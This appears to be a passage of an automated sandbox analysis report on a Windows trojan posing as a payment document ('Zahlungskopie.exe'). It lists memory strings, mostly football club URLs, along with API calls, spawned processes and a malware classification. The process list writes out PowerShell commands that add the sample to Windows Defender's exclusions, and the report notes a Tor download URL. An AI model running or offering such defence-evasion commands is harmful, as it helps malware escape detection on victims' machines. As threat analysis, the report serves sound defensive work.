              Source: Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpString found in binary or memory: https://d3j2s6hdd6a7rg.cloudfront.net/v2/uploads/media/partnerlogo/0002/09/thumb_108617_partnerlogo_
              Source: Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpString found in binary or memory: https://d3j2s6hdd6a7rg.cloudfront.net/v2/uploads/media/partnerlogo/0002/09/thumb_108623_partnerlogo_
              Source: Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpString found in binary or memory: https://d3j2s6hdd6a7rg.cloudfront.net/v2/uploads/media/partnerlogo/0002/11/thumb_110194_partnerlogo_
              Source: Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpString found in binary or memory: https://d3j2s6hdd6a7rg.cloudfront.net/v2/uploads/media/partnerlogo/0002/13/thumb_112227_partnerlogo_
              Source: Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpString found in binary or memory: https://d3j2s6hdd6a7rg.cloudfront.net/v2/uploads/media/partnerlogo/0002/13/thumb_112272_partnerlogo_
              Source: Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpString found in binary or memory: https://d3j2s6hdd6a7rg.cloudfront.net/v2/uploads/media/partnerlogo/0002/17/thumb_116415_partnerlogo_
              Source: Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpString found in binary or memory: https://d3j2s6hdd6a7rg.cloudfront.net/v2/uploads/media/partnerlogo/0002/18/thumb_117132_partnerlogo_
              Source: Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpString found in binary or memory: https://eacademy.liverpoolfc.com/
              Source: Zahlungskopie.exe, 00000000.00000002.738784790.0000000003F01000.00000004.00000001.sdmpString found in binary or memory: https://faq.liverpoolfc.com/portal/home
              Source: Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Oswald:400
              Source: powershell.exe, 0000000B.00000003.812678409.000000000562E000.00000004.00000001.sdmp, powershell.exe, 0000000D.00000003.819057899.0000000004FFF000.00000004.00000001.sdmpString found in binary or memory: https://go.micro
              Source: Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpString found in binary or memory: https://instagram.com/realmadrid
              Source: Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpString found in binary or memory: https://iugis.com/uk/home/
              Source: Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpString found in binary or memory: https://matchcentre.liverpoolfc.com?utm_medium=site-link-liverpoolfc.com&amp;utm_source=home-top-nav
              Source: Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpString found in binary or memory: https://mg.co.uk/
              Source: Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpString found in binary or memory: https://nesn.com/liverpool-fc/
              Source: Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpString found in binary or memory: https://plus.google.com/
              Source: Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpString found in binary or memory: https://pubads.g.doubleclick.net/gampad/ads?sz=640x480&iu=/
              Source: Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpString found in binary or memory: https://reachsportshop.com/team/liverpool/
              Source: Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpString found in binary or memory: https://schema.org/Organization
              Source: Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpString found in binary or memory: https://sdk.privacy-center.org/loader.js
              Source: Zahlungskopie.exe, 00000000.00000002.738784790.0000000003F01000.00000004.00000001.sdmp, AdvancedRun.exe.0.drString found in binary or memory: https://sectigo.com/CPS0C
              Source: Zahlungskopie.exe, 00000000.00000002.738784790.0000000003F01000.00000004.00000001.sdmp, AdvancedRun.exe.0.drString found in binary or memory: https://sectigo.com/CPS0D
              Source: Zahlungskopie.exe, 00000000.00000002.738784790.0000000003F01000.00000004.00000001.sdmpString found in binary or memory: https://secure.widget.cloud.opta.net/v3/v3.opta-widgets.js
              Source: Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpString found in binary or memory: https://tribus-watches.com/
              Source: Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpString found in binary or memory: https://twitter.com/ManUtd
              Source: Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpString found in binary or memory: https://uk.joiebaby.com/liverpoolfc/
              Source: Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpString found in binary or memory: https://uk.tigerwit.com/about/liverpool
              Source: Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpString found in binary or memory: https://www.acronis.com/en-gb/
              Source: Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpString found in binary or memory: https://www.axa.com/?utm_source=liverpoolfc&amp;utm_medium=logo-partnership&amp;utm_campaign=lfc1819
              Source: Zahlungskopie.exe, 00000000.00000002.732290944.0000000002F36000.00000004.00000001.sdmpString found in binary or memory: https://www.chelseafc.com
              Source: Zahlungskopie.exeString found in binary or memory: https://www.digicert.com/CPS0
              Source: Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpString found in binary or memory: https://www.easports.com/
              Source: Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpString found in binary or memory: https://www.expedia.co.uk/
              Source: Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpString found in binary or memory: https://www.googletagmanager.com/ns.html?id=GTM-M54566
              Source: Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpString found in binary or memory: https://www.hollyfrontier.com/home/default.aspx
              Source: Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpString found in binary or memory: https://www.levi.com/GB/en_GB/
              Source: Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpoolfc.com
              Source: Zahlungskopie.exe, 00000000.00000002.732325527.0000000002F49000.00000004.00000001.sdmp, Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpoolfc.com/
              Source: Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpoolfc.com/match
              Source: Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpoolfc.com/match/2020-21/all/fixtures-and-results
              Source: Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpoolfc.com/match/2020-21/champions-league
              Source: Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpoolfc.com/match/2020-21/first-team/fixtures-and-results
              Source: Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpoolfc.com/match/2020-21/premier-league-calendar
              Source: Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpoolfc.com/match/2020-21/premier-league-table
              Source: Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpoolfc.com/match/2020-21/u18s/fixtures-and-results
              Source: Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpoolfc.com/match/2020-21/u23s/fixtures-and-results
              Source: Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpoolfc.com/match/2020-21/women/fixtures-and-results
              Source: Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpoolfc.com/match/opta-stats/team-stats
              Source: Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpoolfc.com/news
              Source: Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpoolfc.com/news/academy
              Source: Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpoolfc.com/news/announcements
              Source: Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpoolfc.com/news/axa-training-centre
              Source: Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpoolfc.com/news/community
              Source: Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpoolfc.com/news/first-team
              Source: Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpoolfc.com/news/media-watch
              Source: Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpoolfc.com/news/tickets
              Source: Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpoolfc.com/news/women
              Source: Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpoolfc.com/scripts/logout.php
              Source: Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpString found in binary or memory: https://www.mancity.com
              Source: Zahlungskopie.exe, 00000000.00000002.732325527.0000000002F49000.00000004.00000001.sdmp, Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpString found in binary or memory: https://www.mancity.com/base/qDRJjWQmMciVzZexKqxHvQNCUcCUOevUqtCcibaOeqaXQSxokmSbdsVNdhpUn.html
              Source: Zahlungskopie.exe, 00000000.00000002.732290944.0000000002F36000.00000004.00000001.sdmpString found in binary or memory: https://www.manutd.com/
              Source: Zahlungskopie.exe, 00000000.00000002.732290944.0000000002F36000.00000004.00000001.sdmpString found in binary or memory: https://www.manutd.com/en
              Source: Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpString found in binary or memory: https://www.manutd.com/en/Help/Accessibility
              Source: Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpString found in binary or memory: https://www.manutd.com/en/Help/Privacy-Policy
              Source: Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpString found in binary or memory: https://www.manutd.com/en/Partners/Global/Visit-Malta
              Source: Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpString found in binary or memory: https://www.manutd.com/en/help/club-contacts?int_source=manutd.com&amp;int_medium=menu&amp;int_campa
              Source: Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpString found in binary or memory: https://www.manutd.com/en/partners/global/marriott-hotels
              Source: Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpString found in binary or memory: https://www.manutd.com/en/partners/global/swissquote
              Source: Zahlungskopie.exe, 00000000.00000002.732290944.0000000002F36000.00000004.00000001.sdmpString found in binary or memory: https://www.manutd.com4
              Source: Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpString found in binary or memory: https://www.mitel.com/learn/case-studies/liverpool-football-club
              Source: Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpString found in binary or memory: https://www.mondelezinternational.com/
              Source: Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpString found in binary or memory: https://www.nike.com/gb/
              Source: Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpString found in binary or memory: https://www.quorn.com/
              Source: Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpString found in binary or memory: https://www.realmadrid.com
              Source: Zahlungskopie.exe, 00000000.00000002.732325527.0000000002F49000.00000004.00000001.sdmp, Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpString found in binary or memory: https://www.realmadrid.com/base/qDRJjWQmMciVzZexKqxHvQNCUcCUOevUqtCcibaOeqaXQSxokmSbdsVNdhpUn.html
              Source: Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpString found in binary or memory: https://www.snapchat.com/
              Source: Zahlungskopie.exe, 00000012.00000002.913027538.0000000000402000.00000040.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
              Source: Zahlungskopie.exe, 00000012.00000002.915293873.0000000002CC1000.00000004.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
              Source: Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpString found in binary or memory: https://www.tiktok.com/
              Source: Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpString found in binary or memory: https://www.tourism-mauritius.mu
              Source: Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpString found in binary or memory: https://www.twitter.com/realmadrid
              Source: Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpString found in binary or memory: https://www.youtube.com/manutd
              Source: Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpString found in binary or memory: https://www.youtube.com/realmadrid
              Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
              Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
              Source: C:\Users\user\Desktop\Zahlungskopie.exeWindow created: window name: CLIPBRDWNDCLASS
              Source: C:\Users\user\Desktop\Zahlungskopie.exeCode function: 0_2_015DB2940_2_015DB294
              Source: C:\Users\user\Desktop\Zahlungskopie.exeCode function: 0_2_015DDB400_2_015DDB40
              Source: C:\Users\user\Desktop\Zahlungskopie.exeCode function: 0_2_015DDB300_2_015DDB30
              Source: C:\Users\user\Desktop\Zahlungskopie.exeCode function: 18_2_02B946A018_2_02B946A0
              Source: C:\Users\user\Desktop\Zahlungskopie.exeCode function: 18_2_02B93D5018_2_02B93D50
              Source: C:\Users\user\Desktop\Zahlungskopie.exeCode function: 18_2_02B9469018_2_02B94690
              Source: C:\Users\user\Desktop\Zahlungskopie.exeCode function: 18_2_02B9461018_2_02B94610
              Source: C:\Users\user\Desktop\Zahlungskopie.exeCode function: 18_2_02B9DA0118_2_02B9DA01
              Source: C:\Users\user\Desktop\Zahlungskopie.exeCode function: 18_2_05ED754018_2_05ED7540
              Source: C:\Users\user\Desktop\Zahlungskopie.exeCode function: 18_2_05ED94F818_2_05ED94F8
              Source: C:\Users\user\Desktop\Zahlungskopie.exeCode function: 18_2_05ED6C7018_2_05ED6C70
              Source: C:\Users\user\AppData\Local\Temp\8f5d8ea2-6047-4797-be42-69846e079291\AdvancedRun.exeCode function: String function: 0040B550 appears 50 times
              Source: Zahlungskopie.exeStatic PE information: invalid certificate
              Source: AdvancedRun.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
              Source: AdvancedRun.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
              Source: Zahlungskopie.exeBinary or memory string: OriginalFilename vs Zahlungskopie.exe
              Source: Zahlungskopie.exe, 00000000.00000002.738784790.0000000003F01000.00000004.00000001.sdmpBinary or memory string: ,@shell32.dllSHGetSpecialFolderPathWshlwapi.dllSHAutoComplete%2.2X%2.2X%2.2X&lt;&gt;&quot;&deg;&amp;<br><font size="%d" color="#%s"><b></b>\StringFileInfo\\VarFileInfo\Translation%4.4X%4.4X040904E4ProductNameFileDescriptionFileVersionProductVersionCompanyNameInternalNameLegalCopyrightOriginalFileNameRSDSu vs Zahlungskopie.exe
              Source: Zahlungskopie.exe, 00000000.00000002.738784790.0000000003F01000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameAdvancedRun.exe8 vs Zahlungskopie.exe
              Source: Zahlungskopie.exe, 00000000.00000002.756274418.0000000004901000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameSHIT.dll* vs Zahlungskopie.exe
              Source: Zahlungskopie.exe, 00000000.00000002.729882875.0000000000BB2000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameCheckValidity.exe< vs Zahlungskopie.exe
              Source: Zahlungskopie.exeBinary or memory string: OriginalFilename vs Zahlungskopie.exe
              Source: Zahlungskopie.exe, 00000010.00000000.721944485.0000000000202000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameCheckValidity.exe< vs Zahlungskopie.exe
              Source: Zahlungskopie.exeBinary or memory string: OriginalFilename vs Zahlungskopie.exe
              Source: Zahlungskopie.exe, 00000011.00000000.723484920.00000000001E2000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameCheckValidity.exe< vs Zahlungskopie.exe
              Source: Zahlungskopie.exeBinary or memory string: OriginalFilename vs Zahlungskopie.exe
              Source: Zahlungskopie.exe, 00000012.00000000.725239793.0000000000832000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameCheckValidity.exe< vs Zahlungskopie.exe
              Source: Zahlungskopie.exe, 00000012.00000002.913027538.0000000000402000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameSjSc VDH.exe2 vs Zahlungskopie.exe
              Source: Zahlungskopie.exe, 00000012.00000002.914226982.0000000000F5A000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Zahlungskopie.exe
              Source: Zahlungskopie.exeBinary or memory string: OriginalFilenameCheckValidity.exe< vs Zahlungskopie.exe
              Source: classification engineClassification label: mal80.troj.evad.winEXE@17/16@21/5
              Source: C:\Users\user\AppData\Local\Temp\8f5d8ea2-6047-4797-be42-69846e079291\AdvancedRun.exeCode function: 7_2_00408FC9 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueW,GetProcAddress,AdjustTokenPrivileges,GetLastError,FindCloseChangeNotification,7_2_00408FC9
              Source: C:\Users\user\AppData\Local\Temp\8f5d8ea2-6047-4797-be42-69846e079291\AdvancedRun.exeCode function: 9_2_00408FC9 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueW,GetProcAddress,AdjustTokenPrivileges,GetLastError,FindCloseChangeNotification,9_2_00408FC9
              Source: C:\Users\user\AppData\Local\Temp\8f5d8ea2-6047-4797-be42-69846e079291\AdvancedRun.exeCode function: 7_2_004095FD CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,OpenProcess,OpenProcess,memset,GetModuleHandleW,GetProcAddress,QueryFullProcessImageNameW,CloseHandle,Process32NextW,CloseHandle,7_2_004095FD
              Source: C:\Users\user\AppData\Local\Temp\8f5d8ea2-6047-4797-be42-69846e079291\AdvancedRun.exeCode function: 7_2_0040A33B FindResourceW,SizeofResource,LoadResource,LockResource,7_2_0040A33B
              Source: C:\Users\user\AppData\Local\Temp\8f5d8ea2-6047-4797-be42-69846e079291\AdvancedRun.exeCode function: 7_2_00401306 OpenServiceW,CloseServiceHandle,QueryServiceStatus,StartServiceW,CloseServiceHandle,CloseServiceHandle,7_2_00401306
              Source: C:\Users\user\Desktop\Zahlungskopie.exeFile created: C:\Users\user\AppData\Local\EyZTsSvYLRhPfexadIJump to behavior
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6868:120:WilError_01
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6936:120:WilError_01
              Source: C:\Users\user\Desktop\Zahlungskopie.exeFile created: C:\Users\user\AppData\Local\Temp\8f5d8ea2-6047-4797-be42-69846e079291Jump to behavior
              Source: Zahlungskopie.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\Zahlungskopie.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
              Source: C:\Users\user\Desktop\Zahlungskopie.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
              Source: C:\Users\user\Desktop\Zahlungskopie.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Users\user\Desktop\Zahlungskopie.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: C:\Users\user\Desktop\Zahlungskopie.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: C:\Users\user\Desktop\Zahlungskopie.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\Desktop\Zahlungskopie.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\Desktop\Zahlungskopie.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\Desktop\Zahlungskopie.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: Zahlungskopie.exeReversingLabs: Detection: 29%
              Source: C:\Users\user\Desktop\Zahlungskopie.exeFile read: C:\Users\user\Desktop\Zahlungskopie.exe:Zone.IdentifierJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\Zahlungskopie.exe 'C:\Users\user\Desktop\Zahlungskopie.exe'
              Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\8f5d8ea2-6047-4797-be42-69846e079291\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\8f5d8ea2-6047-4797-be42-69846e079291\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\8f5d8ea2-6047-4797-be42-69846e079291\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
              Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\8f5d8ea2-6047-4797-be42-69846e079291\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\8f5d8ea2-6047-4797-be42-69846e079291\AdvancedRun.exe' /SpecialRun 4101d8 6584
              Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Zahlungskopie.exe' -Force
              Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Zahlungskopie.exe' -Force
              Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: unknownProcess created: C:\Users\user\Desktop\Zahlungskopie.exe C:\Users\user\Desktop\Zahlungskopie.exe
              Source: unknownProcess created: C:\Users\user\Desktop\Zahlungskopie.exe C:\Users\user\Desktop\Zahlungskopie.exe
              Source: unknownProcess created: C:\Users\user\Desktop\Zahlungskopie.exe C:\Users\user\Desktop\Zahlungskopie.exe
              Source: C:\Users\user\Desktop\Zahlungskopie.exeProcess created: C:\Users\user\AppData\Local\Temp\8f5d8ea2-6047-4797-be42-69846e079291\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\8f5d8ea2-6047-4797-be42-69846e079291\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\8f5d8ea2-6047-4797-be42-69846e079291\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /RunJump to behavior
              Source: C:\Users\user\Desktop\Zahlungskopie.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Zahlungskopie.exe' -ForceJump to behavior
              Source: C:\Users\user\Desktop\Zahlungskopie.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Zahlungskopie.exe' -ForceJump to behavior
              Source: C:\Users\user\Desktop\Zahlungskopie.exeProcess created: C:\Users\user\Desktop\Zahlungskopie.exe C:\Users\user\Desktop\Zahlungskopie.exeJump to behavior
              Source: C:\Users\user\Desktop\Zahlungskopie.exeProcess created: C:\Users\user\Desktop\Zahlungskopie.exe C:\Users\user\Desktop\Zahlungskopie.exeJump to behavior
              Source: C:\Users\user\Desktop\Zahlungskopie.exeProcess created: C:\Users\user\Desktop\Zahlungskopie.exe C:\Users\user\Desktop\Zahlungskopie.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\8f5d8ea2-6047-4797-be42-69846e079291\AdvancedRun.exeProcess created: C:\Users\user\AppData\Local\Temp\8f5d8ea2-6047-4797-be42-69846e079291\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\8f5d8ea2-6047-4797-be42-69846e079291\AdvancedRun.exe' /SpecialRun 4101d8 6584Jump to behavior
              Source: C:\Users\user\Desktop\Zahlungskopie.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F324E4F9-8496-40b2-A1FF-9617C1C9AFFE}\InProcServer32Jump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Users\user\Desktop\Zahlungskopie.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
              Source: Zahlungskopie.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
              Source: Zahlungskopie.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
              Source: Binary string: c:\Projects\VS2005\AdvancedRun\Release\AdvancedRun.pdb source: Zahlungskopie.exe, 00000000.00000002.738784790.0000000003F01000.00000004.00000001.sdmp, AdvancedRun.exe, 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 00000009.00000000.695170028.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe.0.dr

              Data Obfuscation:

              barindex
              Binary contains a suspicious time stampShow sources
              Source: initial sampleStatic PE information: 0x80B55EFB [Sat Jun 5 16:59:39 2038 UTC]
              Source: C:\Users\user\AppData\Local\Temp\8f5d8ea2-6047-4797-be42-69846e079291\AdvancedRun.exeCode function: 7_2_0040289F LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,7_2_0040289F
              Source: C:\Users\user\AppData\Local\Temp\8f5d8ea2-6047-4797-be42-69846e079291\AdvancedRun.exeCode function: 7_2_0040B550 push eax; ret 7_2_0040B564
              Source: C:\Users\user\AppData\Local\Temp\8f5d8ea2-6047-4797-be42-69846e079291\AdvancedRun.exeCode function: 7_2_0040B550 push eax; ret 7_2_0040B58C
              Source: C:\Users\user\AppData\Local\Temp\8f5d8ea2-6047-4797-be42-69846e079291\AdvancedRun.exeCode function: 7_2_0040B50D push ecx; ret 7_2_0040B51D
              Source: C:\Users\user\AppData\Local\Temp\8f5d8ea2-6047-4797-be42-69846e079291\AdvancedRun.exeCode function: 9_2_0040B550 push eax; ret 9_2_0040B564
              Source: C:\Users\user\AppData\Local\Temp\8f5d8ea2-6047-4797-be42-69846e079291\AdvancedRun.exeCode function: 9_2_0040B550 push eax; ret 9_2_0040B58C
              Source: C:\Users\user\AppData\Local\Temp\8f5d8ea2-6047-4797-be42-69846e079291\AdvancedRun.exeCode function: 9_2_0040B50D push ecx; ret 9_2_0040B51D
              Source: C:\Users\user\Desktop\Zahlungskopie.exeCode function: 18_2_05EDB0E8 push eax; retf 18_2_05EDB3BD
